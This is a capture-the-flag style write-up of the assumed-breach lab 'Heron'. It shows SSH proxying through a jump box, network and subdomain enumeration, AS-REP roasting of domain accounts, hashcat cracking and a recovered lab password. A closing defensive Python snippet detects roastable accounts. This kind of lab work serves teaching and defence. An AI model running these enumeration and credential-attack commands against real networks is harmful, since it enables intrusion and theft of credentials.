Ahhh, the `Assumed Breach` scenario: always an interesting exercise. Not only are these assessments enjoyable as a tester, but they also provide significant insight for the client. The assumed breach approach shifts focus away from perimeter defences and instead acknowledges a fundamental reality: at some point, an attacker will gain access. Whether this is through a zero-day such as the Exchange or FortiGate exploits, or a phishing attack leading to cloud or local host access, initial compromise is inevitable at some point. In most cases, the attacker will start with some sort of valid credentials, operating within a compromised network device, server, or appliance. Rather than focusing on how they got in, the emphasis is placed on what happens next. From experience, this is where many environments fall short.

That being said, let's jump into Heron, a two-machine chain from Vulnlab in an assumed breach scenario.

#### Credentials 🕵🏽‍♂️
---
Checking out the wiki, it shows we have been given valid credentials for a JumpBox.

```
pentest:Heron123!
```

Excellent stuff 👩🏽‍🚀

#### Jump Box 🦘
---
First off, let's see what ports are open on the jump box located at `10.10.206.150`.

```
rustscan -a 10.10.206.150 -- -sC -sV -Pn -n
.----. .-. .-. .----..---.  .----. .---.  .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___}/  {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
You miss 100% of the ports you don't scan. - RustScan

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 1073741716'.
Open 10.10.206.150:22
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sC -sV -Pn -n" on ip
---SNIP---
Nmap scan report for 10.10.206.150
Host is up, received user-set (0.032s latency).
Scanned at 2025-03-08 12:48:35 UTC for 1s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 10:a0:bd:2a:81:3d:37:5d:23:75:c8:d2:83:bf:2a:23 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIVPUPzGA2ERjiZJk6cW/S1+nDZvJbjSLwjGgTU8RETSfBV9pgYbUDrmu28cmDSCKQ0cirkaf3dggjVtJO/EvYM=
|   256 bd:32:29:26:4d:41:d7:56:01:37:bc:10:0c:de:45:24 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFkNc5lDxvCLp4GsbGLiAmmFudhK+TXxP978Cp6Y+z4b
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
---SNIP---
Nmap done: 1 IP address (1 host up) scanned in 1.47 seconds
```

Looks like we have an Ubuntu box with just SSH open on port 22, so we're SSHing in.

Once we are connected successfully, analysis of the `/home` directory exposes two domain accounts, `[email protected]` and `[email protected]`, and also a `_local` account. We also have the name of the domain, `heron.vl`, and the name of the jump server, `[email protected]`.

```
ssh [email protected]
The authenticity of host '10.10.206.150 (10.10.206.150)' can't be established.
ED25519 key fingerprint is SHA256:7vUA9tMchnLRfzMzAtJD+Hwwr0nppIBRhctvevOQbm0.
---SNIP---
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.206.150' (ED25519) to the list of known hosts.
****************************************************
*               Welcome to Heron Corp              *
*   Unauthorized access to 'frajmp.heron.vl' is    *
*   forbidden and will be prosecuted by law.       *
****************************************************
([email protected]) Password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-107-generic x86_64)
---SNIP---
Last login: Fri Jun  7 10:34:38 2024 from 10.8.0.101
pentest@frajmp:~$ ls
pentest@frajmp:~$ cd ..
pentest@frajmp:/home$ ls
_local  pentest  [email protected]  [email protected]
pentest@frajmp:/home$
```

#### What we know so far
---
* `[email protected]` and `[email protected]` domain accounts
* `_local` Ubuntu account
* Domain name `heron.vl`
* Jump server is called `frajmp.heron.vl`

#### Domain Enumeration
---
The jumpbox is a standard Ubuntu server and so doesn't have any specific tools installed. We could transfer them over or, if we have the rights, try to install tools.

Checking the network stack highlights that we are on a `/28` subnet, which is typically small and allows for 16 IPs: 14 hosts plus the network and broadcast addresses.

* Network address: 10.10.206.144
* Usable hosts: 10.10.206.145 - 10.10.206.158
* Broadcast address: 10.10.206.159

```
pentest@frajmp:~$ ip add
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
---SNIP---
2: ens5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc mq state UP group default qlen 1000
    link/ether 0a:a5:62:62:40:6d brd ff:ff:ff:ff:ff:ff
    altname enp0s5
    inet 10.10.206.150/28 metric 100 brd 10.10.206.159 scope global dynamic ens5
       valid_lft 3590sec preferred_lft 3590sec
    inet6 fe80::8a5:62ff:fe62:406d/64 scope link
       valid_lft forever preferred_lft forever
```

#### SSH Proxy
---
In a real engagement it may be acceptable to install additional tooling if the client has spun up a specific instance which is going to be burned after the test, but in this case it makes more sense to SSH proxy everything from our local Kali instance.

```
ssh -D 9050 -N -f [email protected]
****************************************************
*               Welcome to Heron Corp              *
*   Unauthorized access to 'frajmp.heron.vl' is    *
*   forbidden and will be prosecuted by law.       *
****************************************************
([email protected]) Password:
```

Running `ss -tulpn | grep 9050` shows the port has been opened on our local machine.

```
ss -tulpn | grep 9050
tcp   LISTEN 0      128        127.0.0.1:9050       0.0.0.0:*    users:(("ssh",pid=2129,fd=5))
tcp   LISTEN 0      128            [::1]:9050          [::]:*    users:(("ssh",pid=2129,fd=4))
```

#### NXC - NetExec
---
Proxying `nxc` with the `smb` module can quickly and easily confirm which hosts are available and exposing the service on port `445`. In a typical Windows environment this should give us some quick intel. In this case we get the other machine in the chain, the DC located at `10.10.206.149`.

```
proxychains -q nxc smb 10.10.206.144/28
SMB         10.10.206.149   445    MUCDC            [*] Windows Server 2022 Standard 20348 x64 (name:MUCDC) (domain:heron.vl) (signing:True) (SMBv1:True)
Running nxc against 16 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
```

Now we have some additional info, let's update what we know.

#### What we know so far - Update 👍🏽
---
* `[email protected]` and `[email protected]` domain accounts
* `_local` Ubuntu account
* Domain name `heron.vl`
* Jump server is called `frajmp.heron.vl`
* DC IP address `10.10.206.149`
* DC hostname `MUCDC`

#### Rustscan Portable 🚲
---
I normally run `nmap` through the SSH tunnel, especially if it's just a single host. But for some reason it doesn't like to go across the Vulnlab VPN, so I'm transferring `rustscan` over.

```
pentest@frajmp:~$ wget http://10.8.1.197:8008/rustscan
--2025-03-08 17:44:10--  http://10.8.1.197:8008/rustscan
Connecting to 10.8.1.197:8008... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4644976 (4.4M) [application/octet-stream]
Saving to: 'rustscan'

rustscan            100%[===================================>]   4.43M  7.52MB/s    in 0.6s

2025-03-08 17:44:11 (7.52 MB/s) - 'rustscan' saved [4644976/4644976]
```

Let's make `rustscan` executable and scan the DC. It fails because `nmap` isn't installed, but we can work with this.

```
pentest@frajmp:~$ ./rustscan -a 10.10.222.5 -- -sC -sV -Pn -n
.----. .-. .-. .----..---.  .----. .---.  .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___}/  {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
To scan or not to scan? That is the question.

---SNIP---
Open 10.10.222.5:53
Open 10.10.222.5:80
Open 10.10.222.5:88
Open 10.10.222.5:135
Open 10.10.222.5:139
Open 10.10.222.5:389
Open 10.10.222.5:445
Open 10.10.222.5:464
Open 10.10.222.5:593
Open 10.10.222.5:636
Open 10.10.222.5:3268
Open 10.10.222.5:3269
Open 10.10.222.5:3389
Open 10.10.222.5:9389
Open 10.10.222.5:49664
Open 10.10.222.5:49667
Open 10.10.222.5:49669
Open 10.10.222.5:49670
Open 10.10.222.5:52438
Open 10.10.222.5:52451
Open 10.10.222.5:52465
Open 10.10.222.5:52482
Open 10.10.222.5:52520
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sC -sV -Pn -n" on ip 10.10.222.5
Depending on the complexity of the script, results may take some time to appear.
sh: 1: nmap: not found
[!] Error Exit code = 127
```

#### Port 80 🕸
---
`cURL` gives us some user emails: `[email protected]`, `[email protected]` and `[email protected]`.

```
<i class="fas fa-user-tie fa-3x mb-3"></i>
<h5 class="card-title">Wayne Wood</h5>
<p class="card-text">CEO</p>
<p>Email: [email protected]</p>
</div>
</div>
</div>
<div class="col-md-4">
<div class="card mb-4 shadow-sm contact-card">
<div class="card-body">
<i class="fas fa-user-tie fa-3x mb-3"></i>
<h5 class="card-title">Julian Pratt</h5>
<p class="card-text">Head of IT</p>
<p>Email: [email protected]</p>
</div>
</div>
</div>
<div class="col-md-4">
<div class="card mb-4 shadow-sm contact-card">
<div class="card-body">
<i class="fas fa-user-tie fa-3x mb-3"></i>
<h5 class="card-title">Samuel Davies</h5>
<p class="card-text">Accounting</p>
<p>Email: [email protected]</p>
```

#### Sub Domains
---
Enumerating subdomains, because enumeration is always good, we see `accounting.heron.vl`.

```
proxychains -q wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://heron.vl" -H "Host: FUZZ.heron.vl" --hl 86
Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://heron.vl/
Total requests: 19966

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000001972:   401        0 L      0 W        0 Ch        "accounting"
```

It is protected by authentication (the server advertises `Negotiate` and `NTLM`) and gives us a `401 Unauthorized` HTTP code.

```
curl http://accounting.heron.vl -v
*   Trying 10.10.222.5:80...
* Connected to accounting.heron.vl (10.10.222.5) port 80 (#0)
> GET / HTTP/1.1
> Host: accounting.heron.vl
> User-Agent: curl/7.81.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 401 Unauthorized
< Transfer-Encoding: chunked
< Server: Microsoft-IIS/10.0
< WWW-Authenticate: Negotiate
< WWW-Authenticate: NTLM
< X-Powered-By: ASP.NET
< Date: Sat, 08 Mar 2025 18:11:57 GMT
```

#### Where we at? 💭
---
Basically, we got no creds! But we have some usernames!

#### ASREPROAST 🔥
---
As we have no creds, just usernames, we can try an ASREPROAST. Typically, when a client requests a TGT from the KDC (Key Distribution Centre), the request includes the User Principal Name (UPN), a timestamp, and pre-authentication data, which is sent encrypted with the user's password hash. If a user has the `UF_DONT_REQUIRE_PREAUTH` flag set, this pre-authentication data is not required and the KDC hands back the AS-REP (with the TGT) without the password ever being proven. That reply contains a part encrypted with the user's key, which is what gets cracked offline in the Hashcat step. Seems silly, but as with most of these things it's typically there to support legacy systems, applications, or custom Kerberos setups.

```
proxychains -q nxc ldap mucdc -u users -p '' --asreproast ASREPROAST
```

#### Hashcat 🐈
---
```
hashcat -m 18200 -a 0 samuel.davies.hash /usr/share/wordlists/rockyou.txt
```

```
PASSWORD: [email protected]:l6fkiy9oN
```
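As an added defender-side example (not part of the original write-up), the two checks that matter for the ASREPROAST step above: a `userAccountControl` audit for the `UF_DONT_REQUIRE_PREAUTH` bit (0x400000), and a filter over Event ID 4768 (Kerberos TGT requested) records for requests made with Pre-Authentication Type 0, the RC4 (0x17) variant of which produces the `hashcat -m 18200` material. All account names, addresses and event records are constructed.

```python
from dataclasses import dataclass

UF_ACCOUNTDISABLE = 0x2
UF_DONT_REQUIRE_PREAUTH = 0x400000  # ADS_UF_DONT_REQUIRE_PREAUTH

# Constructed (sAMAccountName, userAccountControl) pairs as an LDAP query
# would return them; hypothetical accounts, not Heron data.
SAMPLE_UAC = [
    ("wayne.wood", 0x10200),                # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD
    ("julian.pratt", 0x10200),
    ("samuel.davies", 0x10200 | 0x400000),  # pre-auth not required
    ("svc_legacy", 0x10202 | 0x400000),     # flagged, but account disabled
]

def accounts_without_preauth(entries, include_disabled=False):
    """Names whose userAccountControl has DONT_REQ_PREAUTH set."""
    found = []
    for name, uac in entries:
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        if uac & UF_ACCOUNTDISABLE and not include_disabled:
            continue
        found.append(name)
    return found

@dataclass
class Event4768:
    account: str
    client_ip: str
    preauth_type: int   # 0 = no pre-authentication, 2 = PA-ENC-TIMESTAMP
    ticket_etype: int   # 0x17 = RC4-HMAC, 0x12 = AES256
    result_code: int    # 0x0 = success

# Constructed records: one normal logon, then two TGT requests without
# pre-auth from the jump box address, one of them with an RC4 ticket.
SAMPLE_4768 = [
    Event4768("wayne.wood", "10.10.206.151", 2, 0x12, 0x0),
    Event4768("samuel.davies", "10.10.206.150", 0, 0x17, 0x0),
    Event4768("samuel.davies", "10.10.206.150", 0, 0x12, 0x0),
]

def asrep_roast_candidates(events, rc4_only=True):
    """Successful TGT requests made with no pre-authentication; rc4_only
    additionally requires the RC4 ticket etype behind hashcat -m 18200."""
    return [e for e in events
            if e.result_code == 0 and e.preauth_type == 0
            and (not rc4_only or e.ticket_etype == 0x17)]
```

Pre-Authentication Type 0 on its own is the signal that the account is roastable; the RC4 filter narrows it to the requests that yield a crackable hash.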